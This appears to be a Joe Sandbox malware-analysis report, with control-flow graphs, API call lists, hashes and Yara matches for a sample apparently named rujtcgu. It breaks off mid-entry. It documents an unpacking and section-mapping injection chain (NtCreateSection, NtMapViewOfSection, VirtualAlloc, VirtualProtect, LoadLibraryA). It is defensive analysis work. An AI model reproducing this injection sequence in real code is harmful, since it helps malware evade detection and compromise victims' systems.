                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
                                                                                                • Instruction ID: 38351c2ed745b14c386feeb15f7f798b9746b37af39e32a5701b5c9e944eb928
                                                                                                • Opcode Fuzzy Hash: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
                                                                                                • Instruction Fuzzy Hash: 62C0923264112BCFC6358F2DC48CBD573B7AA9970338705AAC8818741ADB20E1AB8F48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
                                                                                                • Instruction ID: 4231ba0c904557ffbbe8bc52a0ffdfb71a90202ecc68a120afadf1cd8174fbf3
                                                                                                • Opcode Fuzzy Hash: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
                                                                                                • Instruction Fuzzy Hash:

                                                                                                Execution Graph

                                                                                                Execution Coverage:6.3%
                                                                                                Dynamic/Decrypted Code Coverage:51.9%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:52
                                                                                                Total number of Limit Nodes:3
                                                                                                execution_graph 3669 2f211b3 3672 2f211c4 3669->3672 3673 2f211d3 3672->3673 3676 2f21964 3673->3676 3678 2f2197f 3676->3678 3677 2f21988 CreateToolhelp32Snapshot 3677->3678 3679 2f219a4 Module32First 3677->3679 3678->3677 3678->3679 3680 2f219b3 3679->3680 3681 2f211c3 3679->3681 3683 2f21623 3680->3683 3684 2f2164e 3683->3684 3685 2f21697 3684->3685 3686 2f2165f VirtualAlloc 3684->3686 3685->3685 3686->3685 3687 403031 3688 40303a 3687->3688 3689 402fbf 3687->3689 3692 4019b2 3689->3692 3691 402fda 3693 4019c3 3692->3693 3694 4019fc Sleep 3693->3694 3695 401a17 3694->3695 3697 401a28 3695->3697 3698 4015d5 3695->3698 3697->3691 3699 4015e4 3698->3699 3700 401688 NtDuplicateObject 3699->3700 3709 4017a4 3699->3709 3701 4016a5 NtCreateSection 3700->3701 3700->3709 3702 401725 NtCreateSection 3701->3702 3703 4016cb NtMapViewOfSection 3701->3703 3705 401751 3702->3705 3702->3709 3703->3702 3704 4016ee NtMapViewOfSection 3703->3704 3704->3702 3706 40170c 3704->3706 3707 40175b NtMapViewOfSection 3705->3707 3705->3709 3706->3702 3708 401782 NtMapViewOfSection 3707->3708 3707->3709 3708->3709 3709->3697 3710 2ee003c 3711 2ee0049 3710->3711 3723 2ee0e0f SetErrorMode SetErrorMode 3711->3723 3716 2ee0265 3717 2ee02ce VirtualProtect 3716->3717 3719 2ee030b 3717->3719 3718 2ee0439 VirtualFree 3722 2ee04be LoadLibraryA 3718->3722 3719->3718 3721 2ee08c7 3722->3721 3724 2ee0223 3723->3724 3725 2ee0d90 3724->3725 3726 2ee0dad 3725->3726 3727 2ee0dbb GetPEB 3726->3727 3728 2ee0238 VirtualAlloc 3726->3728 3727->3728 3728->3716 3729 402f3d 3730 402f4e 3729->3730 3731 4019b2 8 API calls 3730->3731 3732 402fda 3730->3732 3731->3732

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 85 40156b-401577 86 4015a3-4015a6 85->86 87 401579-40157e 85->87 90 4015a8-4015c7 86->90 91 4015fe-401632 call 40125c 86->91 88 401580-401599 87->88 89 40154a-401551 87->89 88->86 92 401553-401569 89->92 93 40151d-401546 call 40125c 89->93 90->91 103 401634 91->103 104 401637-40163c 91->104 92->85 93->89 103->104 106 401642-401653 104->106 107 401959-401961 104->107 111 401957 106->111 112 401659-401682 106->112 107->104 110 401966-4019af call 40125c 107->110 111->110 112->111 119 401688-40169f NtDuplicateObject 112->119 119->111 121 4016a5-4016c9 NtCreateSection 119->121 123 401725-40174b NtCreateSection 121->123 124 4016cb-4016ec NtMapViewOfSection 121->124 123->111 127 401751-401755 123->127 124->123 126 4016ee-40170a NtMapViewOfSection 124->126 126->123 129 40170c-401722 126->129 127->111 131 40175b-40177c NtMapViewOfSection 127->131 129->123 131->111 133 401782-40179e NtMapViewOfSection 131->133 133->111 136 4017a4 call 4017a9 133->136
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                • Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
                                                                                                • Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                • Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 138 4015d5-401605 143 401608-401632 call 40125c 138->143 144 4015fb-401601 138->144 150 401634 143->150 151 401637-40163c 143->151 144->143 150->151 153 401642-401653 151->153 154 401959-401961 151->154 158 401957 153->158 159 401659-401682 153->159 154->151 157 401966-4019af call 40125c 154->157 158->157 159->158 166 401688-40169f NtDuplicateObject 159->166 166->158 168 4016a5-4016c9 NtCreateSection 166->168 170 401725-40174b NtCreateSection 168->170 171 4016cb-4016ec NtMapViewOfSection 168->171 170->158 174 401751-401755 170->174 171->170 173 4016ee-40170a NtMapViewOfSection 171->173 173->170 176 40170c-401722 173->176 174->158 178 40175b-40177c NtMapViewOfSection 174->178 176->170 178->158 180 401782-40179e NtMapViewOfSection 178->180 180->158 183 4017a4 call 4017a9 180->183
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                • Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
                                                                                                • Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                • Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 185 401603-401605 187 401608-401632 call 40125c 185->187 188 4015fb-401601 185->188 194 401634 187->194 195 401637-40163c 187->195 188->187 194->195 197 401642-401653 195->197 198 401959-401961 195->198 202 401957 197->202 203 401659-401682 197->203 198->195 201 401966-4019af call 40125c 198->201 202->201 203->202 210 401688-40169f NtDuplicateObject 203->210 210->202 212 4016a5-4016c9 NtCreateSection 210->212 214 401725-40174b NtCreateSection 212->214 215 4016cb-4016ec NtMapViewOfSection 212->215 214->202 218 401751-401755 214->218 215->214 217 4016ee-40170a NtMapViewOfSection 215->217 217->214 220 40170c-401722 217->220 218->202 222 40175b-40177c NtMapViewOfSection 218->222 220->214 222->202 224 401782-40179e NtMapViewOfSection 222->224 224->202 227 4017a4 call 4017a9 224->227
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                • String ID:
                                                                                                • API String ID: 1652636561-0
                                                                                                • Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                • Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
                                                                                                • Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                • Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 229 4015e0-401605 232 401608-401632 call 40125c 229->232 233 4015fb-401601 229->233 239 401634 232->239 240 401637-40163c 232->240 233->232 239->240 242 401642-401653 240->242 243 401959-401961 240->243 247 401957 242->247 248 401659-401682 242->248 243->240 246 401966-4019af call 40125c 243->246 247->246 248->247 255 401688-40169f NtDuplicateObject 248->255 255->247 257 4016a5-4016c9 NtCreateSection 255->257 259 401725-40174b NtCreateSection 257->259 260 4016cb-4016ec NtMapViewOfSection 257->260 259->247 263 401751-401755 259->263 260->259 262 4016ee-40170a NtMapViewOfSection 260->262 262->259 265 40170c-401722 262->265 263->247 267 40175b-40177c NtMapViewOfSection 263->267 265->259 267->247 269 401782-40179e NtMapViewOfSection 267->269 269->247 272 4017a4 call 4017a9 269->272
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                • Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
                                                                                                • Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                • Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 274 4015f1-401605 279 401608-401632 call 40125c 274->279 280 4015fb-401601 274->280 286 401634 279->286 287 401637-40163c 279->287 280->279 286->287 289 401642-401653 287->289 290 401959-401961 287->290 294 401957 289->294 295 401659-401682 289->295 290->287 293 401966-4019af call 40125c 290->293 294->293 295->294 302 401688-40169f NtDuplicateObject 295->302 302->294 304 4016a5-4016c9 NtCreateSection 302->304 306 401725-40174b NtCreateSection 304->306 307 4016cb-4016ec NtMapViewOfSection 304->307 306->294 310 401751-401755 306->310 307->306 309 4016ee-40170a NtMapViewOfSection 307->309 309->306 312 40170c-401722 309->312 310->294 314 40175b-40177c NtMapViewOfSection 310->314 312->306 314->294 316 401782-40179e NtMapViewOfSection 314->316 316->294 319 4017a4 call 4017a9 316->319
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                • Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
                                                                                                • Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                • Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 321 4015f5-401605 324 401608-401632 call 40125c 321->324 325 4015fb-401601 321->325 331 401634 324->331 332 401637-40163c 324->332 325->324 331->332 334 401642-401653 332->334 335 401959-401961 332->335 339 401957 334->339 340 401659-401682 334->340 335->332 338 401966-4019af call 40125c 335->338 339->338 340->339 347 401688-40169f NtDuplicateObject 340->347 347->339 349 4016a5-4016c9 NtCreateSection 347->349 351 401725-40174b NtCreateSection 349->351 352 4016cb-4016ec NtMapViewOfSection 349->352 351->339 355 401751-401755 351->355 352->351 354 4016ee-40170a NtMapViewOfSection 352->354 354->351 357 40170c-401722 354->357 355->339 359 40175b-40177c NtMapViewOfSection 355->359 357->351 359->339 361 401782-40179e NtMapViewOfSection 359->361 361->339 364 4017a4 call 4017a9 361->364
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                • Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
                                                                                                • Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                • Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 366 4015f8-401632 call 40125c 374 401634 366->374 375 401637-40163c 366->375 374->375 377 401642-401653 375->377 378 401959-401961 375->378 382 401957 377->382 383 401659-401682 377->383 378->375 381 401966-4019af call 40125c 378->381 382->381 383->382 390 401688-40169f NtDuplicateObject 383->390 390->382 392 4016a5-4016c9 NtCreateSection 390->392 394 401725-40174b NtCreateSection 392->394 395 4016cb-4016ec NtMapViewOfSection 392->395 394->382 398 401751-401755 394->398 395->394 397 4016ee-40170a NtMapViewOfSection 395->397 397->394 400 40170c-401722 397->400 398->382 402 40175b-40177c NtMapViewOfSection 398->402 400->394 402->382 404 401782-40179e NtMapViewOfSection 402->404 404->382 407 4017a4 call 4017a9 404->407
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                • Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
                                                                                                • Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                • Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 409 40161a-401632 call 40125c 415 401634 409->415 416 401637-40163c 409->416 415->416 418 401642-401653 416->418 419 401959-401961 416->419 423 401957 418->423 424 401659-401682 418->424 419->416 422 401966-4019af call 40125c 419->422 423->422 424->423 431 401688-40169f NtDuplicateObject 424->431 431->423 433 4016a5-4016c9 NtCreateSection 431->433 435 401725-40174b NtCreateSection 433->435 436 4016cb-4016ec NtMapViewOfSection 433->436 435->423 439 401751-401755 435->439 436->435 438 4016ee-40170a NtMapViewOfSection 436->438 438->435 441 40170c-401722 438->441 439->423 443 40175b-40177c NtMapViewOfSection 439->443 441->435 443->423 445 401782-40179e NtMapViewOfSection 443->445 445->423 448 4017a4 call 4017a9 445->448
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                • Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
                                                                                                • Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                • Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 463 4017df-4017e7 NtMapViewOfSection 465 401782-40179e NtMapViewOfSection 463->465 466 401957-4019af call 40125c 463->466 465->466 468 4017a4 call 4017a9 465->468
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$CreateDuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 3617974760-0
                                                                                                • Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                • Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
                                                                                                • Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                • Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 2ee003c-2ee0047 1 2ee004c-2ee0263 call 2ee0a3f call 2ee0e0f call 2ee0d90 VirtualAlloc 0->1 2 2ee0049 0->2 17 2ee028b-2ee0292 1->17 18 2ee0265-2ee0289 call 2ee0a69 1->18 2->1 20 2ee02a1-2ee02b0 17->20 22 2ee02ce-2ee03c2 VirtualProtect call 2ee0cce call 2ee0ce7 18->22 20->22 23 2ee02b2-2ee02cc 20->23 29 2ee03d1-2ee03e0 22->29 23->20 30 2ee0439-2ee04b8 VirtualFree 29->30 31 2ee03e2-2ee0437 call 2ee0ce7 29->31 33 2ee04be-2ee04cd 30->33 34 2ee05f4-2ee05fe 30->34 31->29 36 2ee04d3-2ee04dd 33->36 37 2ee077f-2ee0789 34->37 38 2ee0604-2ee060d 34->38 36->34 40 2ee04e3-2ee0505 36->40 41 2ee078b-2ee07a3 37->41 42 2ee07a6-2ee07b0 37->42 38->37 43 2ee0613-2ee0637 38->43 51 2ee0517-2ee0520 40->51 52 2ee0507-2ee0515 40->52 41->42 44 2ee086e-2ee08be LoadLibraryA 42->44 45 2ee07b6-2ee07cb 42->45 46 2ee063e-2ee0648 43->46 50 2ee08c7-2ee08f9 44->50 48 2ee07d2-2ee07d5 45->48 46->37 49 2ee064e-2ee065a 46->49 53 2ee07d7-2ee07e0 48->53 54 2ee0824-2ee0833 48->54 49->37 55 2ee0660-2ee066a 49->55 58 2ee08fb-2ee0901 50->58 59 2ee0902-2ee091d 50->59 60 2ee0526-2ee0547 51->60 52->60 61 2ee07e4-2ee0822 53->61 62 2ee07e2 53->62 57 2ee0839-2ee083c 54->57 56 2ee067a-2ee0689 55->56 63 2ee068f-2ee06b2 56->63 64 2ee0750-2ee077a 56->64 57->44 65 2ee083e-2ee0847 57->65 58->59 66 2ee054d-2ee0550 60->66 61->48 62->54 67 2ee06ef-2ee06fc 63->67 68 2ee06b4-2ee06ed 63->68 64->46 69 2ee084b-2ee086c 65->69 70 2ee0849 65->70 72 2ee0556-2ee056b 66->72 73 2ee05e0-2ee05ef 66->73 76 2ee06fe-2ee0748 67->76 77 2ee074b 67->77 68->67 69->57 70->44 74 2ee056f-2ee057a 72->74 75 2ee056d 72->75 73->36 78 2ee057c-2ee0599 74->78 79 2ee059b-2ee05bb 74->79 75->73 76->77 77->56 84 2ee05bd-2ee05db 78->84 79->84 84->66
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02EE024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_2ee0000_rujtcgu.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: 7044c0158e5495c91b6809575acef253c8493cedd29197697cac51bb82bb7e9e
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: C0526A74A01229DFDB64CF98C985BACBBB1BF09314F1480D9E54EAB351DB70AA85CF14

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
